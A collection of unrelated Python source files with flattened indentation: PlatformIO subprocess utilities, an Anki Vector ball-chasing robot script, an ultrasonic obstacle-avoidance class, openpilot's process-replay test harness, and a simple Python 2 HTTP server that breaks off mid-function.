# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import sys
from contextlib import contextmanager
from threading import Thread
from platformio import exception
from platformio.compat import (
IS_WINDOWS,
get_filesystem_encoding,
get_locale_encoding,
string_types,
)
class AsyncPipeBase(object):
def __init__(self):
self._fd_read, self._fd_write = os.pipe()
self._pipe_reader = os.fdopen(self._fd_read, errors="backslashreplace")
self._buffer = ""
self._thread = Thread(target=self.run)
self._thread.start()
def get_buffer(self):
return self._buffer
def fileno(self):
return self._fd_write
def run(self):
try:
self.do_reading()
except (KeyboardInterrupt, SystemExit, IOError):
self.close()
def do_reading(self):
raise NotImplementedError()
def close(self):
self._buffer = ""
os.close(self._fd_write)
self._thread.join()
class BuildAsyncPipe(AsyncPipeBase):
def __init__(self, line_callback, data_callback):
self.line_callback = line_callback
self.data_callback = data_callback
super(BuildAsyncPipe, self).__init__()
def do_reading(self):
line = ""
print_immediately = False
for char in iter(lambda: self._pipe_reader.read(1), ""):
self._buffer += char
if line and char.strip() and line[-3:] == (char * 3):
print_immediately = True
if print_immediately:
# leftover bytes
if line:
self.data_callback(line)
line = ""
self.data_callback(char)
if char == "\n":
print_immediately = False
else:
line += char
if char != "\n":
continue
self.line_callback(line)
line = ""
self._pipe_reader.close()
class LineBufferedAsyncPipe(AsyncPipeBase):
def __init__(self, line_callback):
self.line_callback = line_callback
super(LineBufferedAsyncPipe, self).__init__()
def do_reading(self):
for line in iter(self._pipe_reader.readline, ""):
self._buffer += line
self.line_callback(line)
self._pipe_reader.close()
def exec_command(*args, **kwargs):
result = {"out": None, "err": None, "returncode": None}
default = dict(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
default.update(kwargs)
kwargs = default
p = subprocess.Popen(*args, **kwargs)
try:
result["out"], result["err"] = p.communicate()
result["returncode"] = p.returncode
except KeyboardInterrupt:
raise exception.AbortedByUser()
finally:
for s in ("stdout", "stderr"):
if isinstance(kwargs[s], AsyncPipeBase):
kwargs[s].close()
for s in ("stdout", "stderr"):
if isinstance(kwargs[s], AsyncPipeBase):
result[s[3:]] = kwargs[s].get_buffer()
for k, v in result.items():
if isinstance(result[k], bytes):
try:
result[k] = result[k].decode(
get_locale_encoding() or get_filesystem_encoding()
)
except UnicodeDecodeError:
result[k] = result[k].decode("latin-1")
if v and isinstance(v, string_types):
result[k] = result[k].strip()
return result
@contextmanager
def capture_std_streams(stdout, stderr=None):
_stdout = sys.stdout
_stderr = sys.stderr
sys.stdout = stdout
sys.stderr = stderr or stdout
yield
sys.stdout = _stdout
sys.stderr = _stderr
def is_ci():
return os.getenv("CI", "").lower() == "true"
def is_container():
if os.path.exists("/.dockerenv"):
return True
if not os.path.isfile("/proc/1/cgroup"):
return False
with open("/proc/1/cgroup") as fp:
return ":/docker/" in fp.read()
def get_pythonexe_path():
return os.environ.get("PYTHONEXEPATH", os.path.normpath(sys.executable))
def copy_pythonpath_to_osenv():
_PYTHONPATH = []
if "PYTHONPATH" in os.environ:
_PYTHONPATH = os.environ.get("PYTHONPATH").split(os.pathsep)
for p in os.sys.path:
conditions = [p not in _PYTHONPATH]
if not IS_WINDOWS:
conditions.append(
os.path.isdir(os.path.join(p, "click"))
or os.path.isdir(os.path.join(p, "platformio"))
)
if all(conditions):
_PYTHONPATH.append(p)
os.environ["PYTHONPATH"] = os.pathsep.join(_PYTHONPATH)
def where_is_program(program, envpath=None):
env = os.environ
if envpath:
env["PATH"] = envpath
# try OS's built-in commands
try:
result = exec_command(["where" if IS_WINDOWS else "which", program], env=env)
if result["returncode"] == 0 and os.path.isfile(result["out"].strip()):
return result["out"].strip()
except OSError:
pass
# look up in $PATH
for bin_dir in env.get("PATH", "").split(os.pathsep):
if os.path.isfile(os.path.join(bin_dir, program)):
return os.path.join(bin_dir, program)
if os.path.isfile(os.path.join(bin_dir, "%s.exe" % program)):
return os.path.join(bin_dir, "%s.exe" % program)
return program
def append_env_path(name, value):
cur_value = os.environ.get(name) or ""
if cur_value and value in cur_value.split(os.pathsep):
return cur_value
os.environ[name] = os.pathsep.join([cur_value, value])
return os.environ[name]
def force_exit(code=0):
os._exit(code) # pylint: disable=protected-access
|
Main.py | import threading
import sys
import time
import anki_vector
import numpy as np
from random import randint
from cv2 import cv2
from anki_vector.util import distance_mm, speed_mmps, degrees, Angle, Pose
from anki_vector.events import Events
import math
def handle_object_observed(robot, event_type, event):
"""whenever the CustomMarker used for the goal comes into view the observed position becomes the new goal position
:param robot: instance of robot
:param event_type: default parameter
:param event: default parameter
"""
for obj in robot.world.visible_custom_objects:
if obj.custom_type == anki_vector.objects.CustomObjectTypes.CustomType00:
robot.goal_pose = obj.pose
def drive_for_search(robot):
"""Turn in place to look for the ball
:param robot: instance of the robot
"""
while True:
while robot.ball_not_found:
robot.motors.set_wheel_motors(-15,15)
time.sleep(randint(2,4))
def getMiddleOfElement_area(img, bildRGB):
"""analyze the "white spots" found in serach_ball
:param img: picture for analyzing
:param bildRGB: image for plotting the result on the screen
:return: if middle of ball is found and it's size and vertical position
:rtype: bool, int, double, bool
"""
contours, hierarchy = cv2.findContours(img,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
found_cont=False
for cnt in contours:
area = cv2.contourArea(cnt)
if area > 20:
if area > 3500:
print("BALLL")
return True, 640/2, area, True # Ball found and close to it
print(area)
try:
# Compute the middle of the area identified as the ball:
M = cv2.moments(cnt)
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
cv2.circle(bildRGB, (cX, cY), 7, (255, 255, 255), -1)
return True, cX, area, False # Ball found, but not close enough
except:
pass
return False, 640/2, None, False # Ball not found
def change_direction(area, middle):
"""Turn towards the ball in order to drive straight to it.
Turn faster if the ball is at the border of the robots view, drive faster if the ball is far away
:param area: size from ball on captured image
:param middle: horizontal position from ball
"""
d = middle - 320
a = math.sqrt(50/area)/2
robot.motors.set_wheel_motors(80*d/320, -80*d/320)
robot.motors.set_wheel_motors(60*a+60, 60*a+60)
def search_ball(robot):
""" search ball on captured picture
:param robot: instance of robot
"""
print("searching ball")
# Counter how many camera images without finding the ball:
frames = 0
while True:
img = np.array(robot.camera.latest_image.raw_image)
bildRGB = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
bildBlur = cv2.GaussianBlur(bildRGB, (3,3), 1)
bildHSV = cv2.cvtColor(bildBlur, cv2.COLOR_BGR2HSV)
imgHSV = bildHSV
lower = np.array([0, 116, 148])
upper = np.array([30, 229, 255])
mask = cv2.inRange(imgHSV,lower,upper)
imgContour = img.copy()
success, middle, area, goal = getMiddleOfElement_area(mask, bildRGB)
# Show the camera image and the computed results from above:
cv2.namedWindow("Camera")
cv2.imshow("Camera", bildRGB)
cv2.namedWindow("Mask")
cv2.imshow("Mask", mask)
# Ball found?:
if success==True:
robot.ball_not_found = False
frames = 0
if robot.drivegoal==False:
robot.behavior.set_lift_height(1.0)
if goal==True and robot.drivegoal==False:
robot.behavior.set_lift_height(0.0)
robot.motors.stop_all_motors()
print("drive_to_goal")
robot.behavior.drive_straight(distance_mm(-150), speed_mmps(100))
print("I got the ball.")
x = robot.goal_pose.position.x-robot.pose.position.x
y = robot.pose.position.y
distance_to_goal = math.sqrt(x*x+y*y)
angle_to_goal = np.rad2deg(np.arcsin(x/distance_to_goal))
print("alpha:", angle_to_goal)
# Decide wether tu turn clockwise or counterclockwise:
if y > 0:
robot.behavior.turn_in_place(degrees(-(90-angle_to_goal)), is_absolute=True)
else:
robot.behavior.turn_in_place(degrees((90-angle_to_goal)), is_absolute=True)
# Drive to the goal and check if yet reached.
robot.motors.set_wheel_motors(100,100)
robot.drivegoal = True
drive_goal = threading.Thread(target=drive_to_goal, args=[robot, x, y])
drive_goal.start()
elif robot.drivegoal==False:
change_direction(area, middle)
else: # not found
frames = frames + 1
if(frames > 1): # Threshold to avoid false positives
robot.drivegoal = False
robot.ball_not_found = True
if cv2.waitKey(1) & 0xFF == ord('q'):
robot.disconnect()
sys.exit()
return False
def drive_to_goal(robot, x, y):
"""Check wether the robot is already at the goal. If so, stop, otherwise drive to goal
:param robot: instance of robot
:param x: vertical distance between goal and robot
:param y: horizontal distance between goal and robot
"""
while robot.drivegoal:
x = robot.goal_pose.position.x - robot.pose.position.x
y = robot.pose.position.y
if x < 50 and abs(y) < 50:
print("Goal")
robot.drivegoal = False
robot.disconnect()
sys.exit()
break
robot.motors.stop_all_motors()
return
def map(robot):
"""Map to track the robot's path during the game
:param robot: instance of robot
"""
map_height = 160*3
map_widht = 100*3
blank_image = np.zeros(shape=[map_height, map_widht, 3], dtype=np.uint8)
cv2.circle(blank_image, center=(150,map_height-15 *3), radius=4, color=(0, 255, 0), thickness=20) #Start
cv2.rectangle(blank_image,(40*3,0),(60*3,6),(255,0,0),12)
while True:
xcm = int(robot.pose.position.x/10)
ycm = int(robot.pose.position.y/10)
cv2.circle(blank_image, center=(150-ycm*3,map_height-(15*3+xcm*3)), radius=2, color=(0, 0, 255), thickness=2)
if(robot.ball_not_found):
cv2.putText(blank_image,"Ball not found ",(1,map_height-5),cv2.FONT_HERSHEY_SIMPLEX,0.4,(255,0,0))
else:
cv2.putText(blank_image,"Ball found ",(1,map_height-5),cv2.FONT_HERSHEY_SIMPLEX,0.4,(0,255,0))
cv2.namedWindow("map")
cv2.imshow("map", blank_image)
if cv2.waitKey(1) & 0xFF==ord('q'):
sys.exit()
def initialize():
"""Initialize the robot and the game constraints
:return: instance of Robot()
:rtype: robot
"""
robot = anki_vector.Robot()
robot.connect()
robot.camera.init_camera_feed()
robot.behavior.set_lift_height(0.0)
robot.behavior.set_head_angle(degrees(0))
robot.goal_pose = Pose(x=(160-15)*10, y=0, z=0, angle_z=anki_vector.util.Angle(degrees=0))
robot.events.subscribe(handle_object_observed, Events.object_observed)
robot.enable_custom_object_detection = True
robot.world.define_custom_wall(anki_vector.objects.CustomObjectTypes.CustomType00, anki_vector.objects.CustomObjectMarkers.Triangles5, width_mm=200.0, height_mm=300.0, marker_width_mm=170.0, marker_height_mm=170.0)
robot.behavior.say_text("I'm ready!")
robot.ball_not_found = True
robot.drivegoal = False
return robot
# Starting the robot and afterwards the game:
robot = initialize()
print("robot started")
# Starting the map:
initmap = threading.Thread(target=map, args=[robot])
initmap.start()
print("Map started")
# Starting searching Thread:
drive_around_thread = threading.Thread(target=drive_for_search, args=[robot])
drive_around_thread.start()
print("drive_around started")
search_ball(robot)
|
avoidance.py | from src.motors_pwm import *
from src.distance import *
import threading
import time
class Avoidance():
def __init__(self, motors_obj):
self.motors_obj = motors_obj
distance_init()
self.speed = 30
self.near_threshold = 15
thread = threading.Thread(target=self._thread)
thread.start()
# Return True if the ultrasonic sensor sees an obstacle
def is_near_obstacle(self):
distance = get_distance()
# print("IsNearObstacle: "+str(Distance))
if distance < self.near_threshold and distance > 0:
return True
else:
return False
# Move back a little, then turn right
def avoid_obstacle(self):
# Back off a little
self.motors_obj.a_backwards(self.speed)
self.motors_obj.b_backwards(self.speed)
time.sleep(0.5)
self.motors_obj.all_motors_off()
'''
# Turn right
self.motors_obj.a_forwards(self.speed)
time.sleep(0.75)
self.motors_obj.all_motors_off()
'''
def _thread(self):
while True:
if self.is_near_obstacle():
self.avoid_obstacle()
|
process_replay.py | #!/usr/bin/env python3
import importlib
import os
import sys
import threading
import time
from collections import namedtuple
import capnp
from tqdm import tqdm
import cereal.messaging as messaging
from cereal import car, log
from cereal.services import service_list
from common.params import Params
from selfdrive.car.car_helpers import get_car
from selfdrive.manager.process import PythonProcess
from selfdrive.manager.process_config import managed_processes
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
CI = "CI" in os.environ
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance'])
def wait_for_event(evt):
if not evt.wait(15):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['lateralPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"deviceState": [], "pandaState": [], "liveCalibration": [], "driverMonitoringState": [], "longitudinalPlan": [], "lateralPlan": [], "liveLocationKalman": [], "liveParameters": [], "radarState": [],
"modelV2": [], "driverCameraState": [], "roadCameraState": [], "ubloxRaw": [], "managerState": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "carState": [], "modelV2": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"modelV2": ["lateralPlan"], "radarState": ["longitudinalPlan"],
"carState": [], "controlsState": [], "liveParameters": [],
},
ignore=["logMonoTime", "valid", "longitudinalPlan.processingDelay"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["driverMonitoringState"],
"liveCalibration": [], "carState": [], "modelV2": [], "controlsState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
),
]
def replay_process(cfg, lr):
proc = managed_processes[cfg.proc_name]
if isinstance(proc, PythonProcess):
return python_replay_process(cfg, lr)
else:
return cpp_replay_process(cfg, lr)
def python_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
params = Params()
params.clear_all()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
os.environ['FINGERPRINT'] = msg.carParams.carFingerprint
assert(type(managed_processes[cfg.proc_name]) is PythonProcess)
managed_processes[cfg.proc_name].prepare()
mod = importlib.import_module(managed_processes[cfg.proc_name].module)
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs, disable=CI):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
sockets = {s: messaging.sub_sock(s, timeout=1000) for s in sub_sockets}
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
managed_processes[cfg.proc_name].prepare()
managed_processes[cfg.proc_name].start()
time.sleep(1) # We give the process time to start
log_msgs = []
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for msg in tqdm(pub_msgs, disable=CI):
pm.send(msg.which(), msg.as_builder())
resp_sockets = sub_sockets if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is not None:
log_msgs.append(response)
managed_processes[cfg.proc_name].stop()
return log_msgs
|
simple_http_server.py | import os
import urlparse
import datetime
import threading
import mimetools
import socket
import errno
import sys
import select
import time
import json
import xlog
logging = xlog.Logger()
class HttpServerHandler():
default_request_version = "HTTP/1.1"
MessageClass = mimetools.Message
rbufsize = -1
wbufsize = 0
def __init__(self, sock, client, args):
self.connection = sock
self.rfile = socket._fileobject(self.connection, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.connection, "wb", self.wbufsize)
self.client_address = client
self.args = args
self.setup()
def setup(self):
pass
def handle(self):
#logging.info('Connected from %r', self.client_address)
while True:
try:
self.close_connection = 1
self.handle_one_request()
except Exception as e:
#logging.warn("handle err:%r close", e)
self.close_connection = 1
if self.close_connection:
break
self.connection.close()
#logging.debug("closed from %s:%d", self.client_address[0], self.client_address[1])
def address_string(self):
return '%s:%s' % self.client_address[:2]
def parse_request(self):
self.command = None # set in case of error on the first line
self.request_version = version = self.default_request_version
requestline = self.raw_requestline
requestline = requestline.rstrip('\r\n')
self.requestline = requestline
words = requestline.split()
if len(words) == 3:
command, path, version = words
if version[:5] != 'HTTP/':
self.send_error(400, "Bad request version (%r)" % version)
return False
try:
base_version_number = version.split('/', 1)[1]
version_number = base_version_number.split(".")
# RFC 2145 section 3.1 says there can be only one "." and
# - major and minor numbers MUST be treated as
# separate integers;
# - HTTP/2.4 is a lower version than HTTP/2.13, which in
# turn is lower than HTTP/12.3;
# - Leading zeros MUST be ignored by recipients.
if len(version_number) != 2:
raise ValueError
version_number = int(version_number[0]), int(version_number[1])
except (ValueError, IndexError):
self.send_error(400, "Bad request version (%r)" % version)
return False
if version_number >= (1, 1):
self.close_connection = 0
if version_number >= (2, 0):
self.send_error(505,
"Invalid HTTP Version (%s)" % base_version_number)
return False
elif len(words) == 2:
command, path = words
self.close_connection = 1
if command != 'GET':
self.send_error(400,
"Bad HTTP/0.9 request type (%r)" % command)
return False
elif not words:
return False
else:
self.send_error(400, "Bad request syntax (%r)" % requestline)
return False
self.command, self.path, self.request_version = command, path, version
# Examine the headers and look for a Connection directive
self.headers = self.MessageClass(self.rfile, 0)
conntype = self.headers.get('Connection', "")
if conntype.lower() == 'close':
self.close_connection = 1
elif conntype.lower() == 'keep-alive':
self.close_connection = 0
return True
def handle_one_request(self):
try:
try:
self.raw_requestline = self.rfile.readline(65537)
except Exception as e:
#logging.warn("simple server handle except %r", e)
return
if len(self.raw_requestline) > 65536:
#logging.warn("recv command line too large")
return
if not self.raw_requestline:
#logging.warn("closed")
return
self.parse_request()
if self.command == "GET":
self.do_GET()
elif self.command == "POST":
self.do_POST()
elif self.command == "CONNECT":
self.do_CONNECT()
elif self.command == "HEAD":
self.do_HEAD()
elif self.command == "DELETE":
self.do_DELETE()
elif self.command == "OPTIONS":
self.do_OPTIONS()
elif self.command == "PUT":
self.do_PUT()
else:
logging.warn("unhandler cmd:%s", self.command)
return
self.wfile.flush() #actually send the response if not already done.
self.close_connection = 0
except socket.error as e:
#logging.warn("socket error:%r", e)
pass
except IOError as e:
if e.errno == errno.EPIPE:
logging.warn("PIPE error:%r", e)
pass
else:
logging.warn("IOError:%r", e)
pass
#except OpenSSL.SSL.SysCallError as e:
# logging.warn("socket error:%r", e)
except Exception as e:
logging.exception("handler:%r", e)
pass
def do_GET(self):
pass
def do_POST(self):
pass
def do_PUT(self):
pass
def do_DELETE(self):
pass
def do_OPTIONS(self):
pass
def do_HEAD(self):
pass
def do_CONNECT(self):
pass
def send_not_found(self):
self.wfile.write(b'HTTP/1.1 404\r\nContent-Type: text/plain\r\nConnection: close\r\n\r\n404 Not Found')
def send_error(self, code, message=None):
self.wfile.write('HTTP/1.1 %d\r\n' % code)
self.wfile.write('Connection: close\r\n\r\n')
if message:
self.wfile.write(message)
def send_response(self, mimetype="", content="", headers="", status=200):
data = []
data.append('HTTP/1.1 %d\r\n' % status)
if len(mimetype):
data.append('Content-Type: %s\r\n' % mimetype)
data.append('Content-Length: %s\r\n' % len(content))
if len(headers):
if isinstance(headers, dict):
for key in headers:
data.append("%s: %s\r\n" % (key, headers[key]))
elif isinstance(headers, basestring):
data.append(headers)
data.append("\r\n")
if len(content) < 1024:
data.append(content)
data_str = "".join(data)
self.wfile.write(data_str)
else:
data_str = "".join(data)
self.wfile.write(data_str)
if len(content):
self.wfile.write(content)
def send_file(self, filename, mimetype):
try:
if not os.path.isfile(filename):
self.send_not_found()
return
file_size = os.path.getsize(filename)
tme = (datetime.datetime.today()+datetime.timedelta(minutes=330)).strftime('%a, %d %b %Y %H:%M:%S GMT')
head = 'HTTP/1.1 200\r\nAccess-Control-Allow-Origin: *\r\nCache-Control:public, max-age=31536000\r\n'
head += 'Expires: %s\r\nContent-Type: %s\r\nContent-Length: %s\r\n\r\n' % (tme, mimetype, file_size)
self.wfile.write(head.encode())
with open(filename, 'rb') as fp:
while True:
data = fp.read(65535)
if not data:
break
self.wfile.write(data)
except:
pass
#logging.warn("download broken")
def response_json(self, res_arr):
data = json.dumps(res_arr, indent=0, sort_keys=True)
self.send_response('application/json', data)
class HTTPServer():
def __init__(self, address, handler, args=(), use_https=False, cert=""):
self.sockets = None
self.running = True
if isinstance(address, tuple):
self.server_address = [address]
else:
#server can listen multi-port
self.server_address = address
self.handler = handler
self.args = args
self.use_https = use_https
self.cert = cert
self.init_socket()
#logging.info("server %s:%d started.", address[0], address[1])
def init_socket(self):
if self.sockets is not None:
self.server_close()
self.sockets = []
for addr in self.server_address:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
sock.bind(addr)
except Exception as e:
logging.error("bind to %s:%d fail", addr[0], addr[1])
raise e
if self.use_https:
import OpenSSL
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
#server.pem's location (containing the server private key and the server certificate).
fpem = self.cert
ctx.use_privatekey_file(fpem)
ctx.use_certificate_file(fpem)
sock = OpenSSL.SSL.Connection(ctx, sock)
sock.listen(200)
self.sockets.append(sock)
logging.info("server %s:%d started.", addr[0], addr[1])
def serve_forever(self):
while self.running:
r, w, e = select.select(self.sockets, [], [], 1)
for rsock in r:
try:
(sock, address) = rsock.accept()
except IOError as e:
logging.warn("socket accept fail(errno: %s).", e.args[0])
if e.args[0] == 10022:
logging.info("restart socket server.")
self.init_socket()
break
self.process_connect(sock, address)
def process_connect(self, sock, address):
#logging.debug("connect from %s:%d", address[0], address[1])
client_obj = self.handler(sock, address, self.args)
client_thread = threading.Thread(target=client_obj.handle)
client_thread.start()
def shutdown(self):
self.running = False
def server_close(self):
for sock in self.sockets:
sock.close()
class TestHttpServer(HttpServerHandler):
def __init__(self, sock, client, args):
self.data_path = args
HttpServerHandler.__init__(self, sock, client, args)
def generate_random_lowercase(self, n):
min_lc = ord(b'a')
len_lc = 26
ba = bytearray(os.urandom(n))
for i, b in enumerate(ba):
ba[i] = min_lc + b % len_lc # convert 0..255 to 97..122
#sys.stdout.buffer.write(ba)
return ba
def do_GET(self):
url_path = urlparse.urlparse(self.path).path
req = urlparse.urlparse(self.path).query
reqs = urlparse.parse_qs(req, keep_blank_values=True)
#logging.debug("GET %s from %s:%d", self.path, self.client_address[0], self.client_address[1])
if url_path == '/':
data = "OK\r\n"
self.wfile.write('HTTP/1.1 200\r\nAccess-Control-Allow-Origin: *\r\nContent-Length: %d\r\n\r\n%s' %(len(data), data) )
elif url_path == '/null':
mimetype = "application/x-binary"
if "size" in reqs:
file_size = int(reqs['size'][0])
else:
file_size = 1024 * 1024 * 1024
self.wfile.write('HTTP/1.1 200\r\nContent-Type: %s\r\nContent-Length: %s\r\n\r\n' % (mimetype, file_size))
start = 0
data = self.generate_random_lowercase(65535)
while start < file_size:
left = file_size - start
send_batch = min(left, 65535)
